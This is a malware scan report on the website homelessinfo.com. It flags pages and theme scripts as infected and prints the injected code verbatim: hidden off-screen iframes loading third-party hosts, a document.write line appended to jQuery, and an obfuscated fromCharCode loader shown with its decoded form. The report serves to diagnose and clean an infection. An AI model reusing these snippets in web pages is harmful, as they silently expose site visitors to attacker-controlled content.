Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=homelessinfo.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://homelessinfo.com/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:11 GMT Pragma: no-cache Location: ?id=1 Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1428 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=46ade2ff121a92cd531d07ddd1ce5bde; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://homelessinfo.com/?id=1 | 200 OK Content-Length: 29410 Content-Type: text/html | malicious |
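Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q);
What the snippet does: it creates an iframe whose source is a third-party URL, positions it absolutely at left -4327px so that it is rendered off-screen, and attaches it to the page through a div emitted with document.write. The frameborder value evaluates to 0 unless the visitor's user agent contains the 32-character hex marker. The same snippet appears in the other HTML pages flagged below, so cleanup needs to cover the shared template or include that emits it, not just this one URL.
Antivirus reports: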
| ||
http://homelessinfo.com/themes/maitscocorporate/js/jquery.js | 200 OK Content-Length: 100362 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var _jQuery = window.jQuery, _$ = window.$; var jQuery = window.jQuery = window.$ = function( selector, context ) { return new jQuery.fn.init( selector, context ); }; var quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/, isSimple = /^.[^:#\[\.]*$/, undefined; jQuery.fn = jQuery.prototype = { init: function( selector, context ) { selector = selector || document; if ( selector.nodeType ) { this[0] = selecto jQuery.fn["outer" + name] = function(margin) { return this["inner" + name]() + num(this, "border" + tl + "Width") + num(this, "border" + br + "Width") + (margin ? num(this, "margin" + tl) + num(this, "margin" + br) : 0); }; });})(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>');
Note on reading this listing: the scanner shows only the start and the end of the file, so the excerpt breaks off mid-token in the middle. The library code that is shown appears to be stock jQuery; the flagged part is the document.write call appended after the library's closing `})();`, which emits a 2x2 iframe pointing at a third-party host. The same appended line is reported for the other theme scripts below.
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> | ||
http://homelessinfo.com/themes/maitscocorporate/js/curvycorners.src.js | 200 OK Content-Length: 56082 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function browserdetect() { var agent = navigator.userAgent.toLowerCase(); this.isIE = agent.indexOf("msie") > -1; this.ieVer = this.isIE ? /msie\s(\d\.\d)/.exec(agent)[1] : 0; this.isMoz = agent.indexOf('firefox') != -1; this.isSafari = agent.indexOf('safari') != -1; this.quirksMode= this.isIE && (!document.compatMode || document.compatMode.indexOf("BackCompat") > -1); this.isOp = 'opera' in window; this.isWebKit = age }; } if (typeof curvyCornersNoAutoScan === 'undefined' || curvyCornersNoAutoScan === false) { if (curvyBrowser.isOp) document.addEventListener("DOMContentLoaded", curvyCorners.init, false); else addEvent(window, 'load', curvyCorners.init, false); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> | ||
http://homelessinfo.com/themes/maitscocorporate/js/s3Slider.js | 200 OK Content-Length: 4284 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ $.fn.s3Slider = function(vars) { var element = this; var timeOut = (vars.timeOut != undefined) ? vars.timeOut : 4000; var current = null; var timeOutFn = null; var faderStat = true; var mOver = false; var items = $("#" + element[0].id + "Content ." + element[0].id + "Image"); var itemsSpan = $("#" + element[0].id + "Content ." + } }); }); } } } } makeSlider(); }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> | ||
http://homelessinfo.com/include/xoops.js | 200 OK Content-Length: 7866 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1026703></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1026703></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ return r; } else { return false; } } xoopsOnloadEvent(xoopsExternalLinks); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1026703></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1026703> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1026703> Hidden iFrame found. size: 2x2 src: http://babylonproduction.com/wmci.html?i=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1026703> Hidden iFrame found. size: 2x2 src: http://www.lightdragoons.org/ahhs.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1026703> | ||
http://homelessinfo.com/class/textsanitizer/image/image.js | 200 OK Content-Length: 2055 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://homelessinfo.com/modules/evennews/ | 200 OK Content-Length: 22486 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/extgallery/ | 200 OK Content-Length: 23235 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/smartfaq/ | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:22 GMT Pragma: no-cache Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1382 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=43c6cc4031e193244c461d0d84a32fc4; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://homelessinfo.com/modules/smartfaq/request.php?phpsessid=43c6cc4031e193244c461d0d84a32fc4 | 200 OK Content-Length: 24433 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/liaise/ | 200 OK Content-Length: 23334 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/banners.php?op=click&bid=5 | 200 OK Content-Length: 19 Content-Type: text/html | clean |
http://homelessinfo.com/test404page.js | 404 Not Found Content-Length: 1066 Content-Type: text/html | clean |
http://homelessinfo.com/modules/content/index.php?id=1 | 200 OK Content-Length: 29359 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/content/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:27 GMT Pragma: no-cache Location: ?id=1 Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1428 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=e75ca5e4d650939d92e9eff537697d9d; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://homelessinfo.com/modules/content/?id=1 | 200 OK Content-Length: 29350 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
| ||
http://homelessinfo.com/modules/content/index.php?id=4 | 200 OK Content-Length: 32164 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: homelessinfo.com
Result:
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Apr 2014 19:20:11 GMT
Pragma: no-cache
Location: ?id=1
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 1428
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=46ade2ff121a92cd531d07ddd1ce5bde; path=/
X-Powered-By: PHP/4.4.9
...1428 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: homelessinfo.com
Referer: http://www.google.com/search?q=homelessinfo.com
Result:
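The result is similar to the first query; no suspicious redirects were found. Note that the two requests differ only in the Referer header, so this check covers referrer-conditional redirects only: a redirect keyed on another request attribute (for example the User-Agent, which the server names in its Vary header) would not show up in this comparison.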